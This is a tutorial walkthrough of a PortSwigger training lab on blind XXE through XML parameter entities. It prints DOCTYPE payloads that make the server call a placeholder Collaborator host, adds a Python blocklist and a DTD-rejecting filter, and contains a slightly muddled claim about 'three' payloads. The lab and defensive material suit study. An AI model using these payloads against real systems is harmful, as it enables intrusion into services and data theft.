Hello guys, today we will solve the 4th lab of PortSwigger Web Security, Blind XXE with out-of-band interaction via XML parameter entities. As you know, we are exploring XML external entity (XXE) vulnerabilities in a series and solving their practical labs.
In today’s article, we will solve the lab named “Blind XXE with out-of-band interaction via XML parameter entities” in a step-by-step manner.
Lab Description Of Blind XXE with out-of-band interaction via XML parameter entities
In this lab, there is a “check stock” feature that accepts its input as XML. The application does not display any of the parsed values in its response, and it blocks any request that contains a regular (general) external entity, so the usual XXE payloads are not enough. To solve this lab, we need to define an XML parameter entity that points at a Burp Collaborator URL, reference it so that the server performs a DNS lookup (and HTTP request) to that host, and then check the result in Burp Suite Collaborator.
First, access the lab. After accessing the lab, view any product. On the product page you will find a stock check button. Click the stock check button and intercept the request in Burp Suite.
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
Now, take the given external entity definition (replacing BURP-COLLABORATOR-SUBDOMAIN with your own Collaborator payload), insert it between the XML declaration and the stockCheck element, and forward the request.
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>
I have used the 3 payloads above, one of which will definitely execute.
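To see why the parameter-entity form slips past the lab's filter, here is an added example (my own code, not part of the lab or of PortSwigger's material) that runs a blocklist of the kind the application appears to use, and a hardened gate that refuses any DTD, over constructed stock-check bodies. The request bodies, the placeholder host and the exact shape of the application's blocklist are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies for the stock-check endpoint; the host is a placeholder,
# not a real Collaborator subdomain.
BENIGN = ('<?xml version="1.0" encoding="UTF-8"?>'
          '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')
GENERAL_ENTITY = ('<?xml version="1.0" encoding="UTF-8"?>'
                  '<!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "http://COLLABORATOR-PLACEHOLDER">]>'
                  '<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')
PARAMETER_ENTITY = ('<?xml version="1.0" encoding="UTF-8"?>'
                    '<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://COLLABORATOR-PLACEHOLDER"> %xxe; ]>'
                    '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>')

# Assumed blocklist in the spirit of the lab: it only recognises a general entity
# (<!ENTITY name SYSTEM ...). The '%' of a parameter entity sits where the name is
# expected, so the pattern never matches the payload used in this lab.
GENERAL_ENTITY_RE = re.compile(r'<!ENTITY\s+\w+\s+(?:SYSTEM|PUBLIC)\b', re.I)


def weak_filter_blocks(body: str) -> bool:
    return GENERAL_ENTITY_RE.search(body) is not None


# Hardened gate: a stock check never needs a DTD, so refuse any DOCTYPE or ENTITY
# declaration instead of trying to enumerate dangerous entity shapes.
DTD_RE = re.compile(r'<!(?:DOCTYPE|ENTITY)\b', re.I)


def hardened_filter_blocks(body: str) -> bool:
    return DTD_RE.search(body) is not None


def safe_stock_check(body: str) -> tuple:
    """Reject DTDs up front, then read productId/storeId from the stockCheck element."""
    if hardened_filter_blocks(body):
        raise ValueError("DTD not allowed in stock check request")
    root = ET.fromstring(body)
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element")
    return root.findtext("productId"), root.findtext("storeId")


if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("general", GENERAL_ENTITY), ("parameter", PARAMETER_ENTITY)):
        print(name, "weak blocks:", weak_filter_blocks(body), "hardened blocks:", hardened_filter_blocks(body))
```

Logging every request the hardened gate rejects gives a simple detection point: a stock check carrying a DOCTYPE is never legitimate traffic.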
Now, we need to check Burp Collaborator to see whether any DNS or HTTP requests have been received.
As you can see, we have received requests in Burp Collaborator. Now, let’s check whether the lab has been solved.
We have successfully solved the lab on Blind XXE with out-of-band interaction via XML parameter entities.
To continue studying, check out the next lab, Exploiting Blind XXE To Exfiltrate Data Using A Malicious External DTD; cover the current lab before moving on to the next one. Good luck!